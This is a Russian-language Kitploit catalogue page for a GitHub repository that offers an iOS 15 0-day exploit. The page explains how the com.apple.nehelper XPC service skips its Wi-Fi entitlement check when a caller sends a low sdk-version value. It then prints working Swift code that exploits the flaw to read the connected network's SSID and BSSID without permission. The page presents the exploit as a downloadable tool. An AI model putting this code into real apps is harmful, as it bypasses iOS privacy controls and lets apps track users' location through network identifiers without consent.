Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ios-nehelper-wifi-info-0day — iOS 15 0-day exploit (still works in 15.0.2) | Kitploit
Инструменты/GitHubGitHub/illusionofchaos/ios-nehelper-wifi-info-0day
iOS SecurityExploitationMobile Security
GitHubillusionofchaos/ios-nehelper-wifi-info-0day

ios-nehelper-wifi-info-0day

iOS 15 0-day exploit (still works in 15.0.2)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт
179564 лет назадПроверено Kitploit

Nehelper Wifi Info 0-day (iOS 15.0)

Я обновил этот код, чтобы избежать прямого использования Private API. Подробнее читайте в моём посте в блоге. Однако это означает, что теперь код привязан к конкретной версии iOS и, возможно, к конкретной модели устройства. Поэтому, если он не работает на вашем устройстве, пересчитайте и обновите смещения в файле c.c. Оригинальный код можно найти в ветке direct.

XPC-эндпоинт com.apple.nehelper принимает передаваемый пользователем параметр sdk-version, и если его значение меньше или равно 524288, проверка entitlement com.apple.developer.networking.wifi-info пропускается. Это позволяет любому подходящему приложению (например, имеющему разрешение на доступ к геолокации) получить доступ к информации о Wi-Fi без требуемого entitlement. Это происходит в -[NEHelperWiFiInfoManager checkIfEntitled:] в /usr/libexec/nehelper.

root@kitploit:~
func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}
Скачать инструмент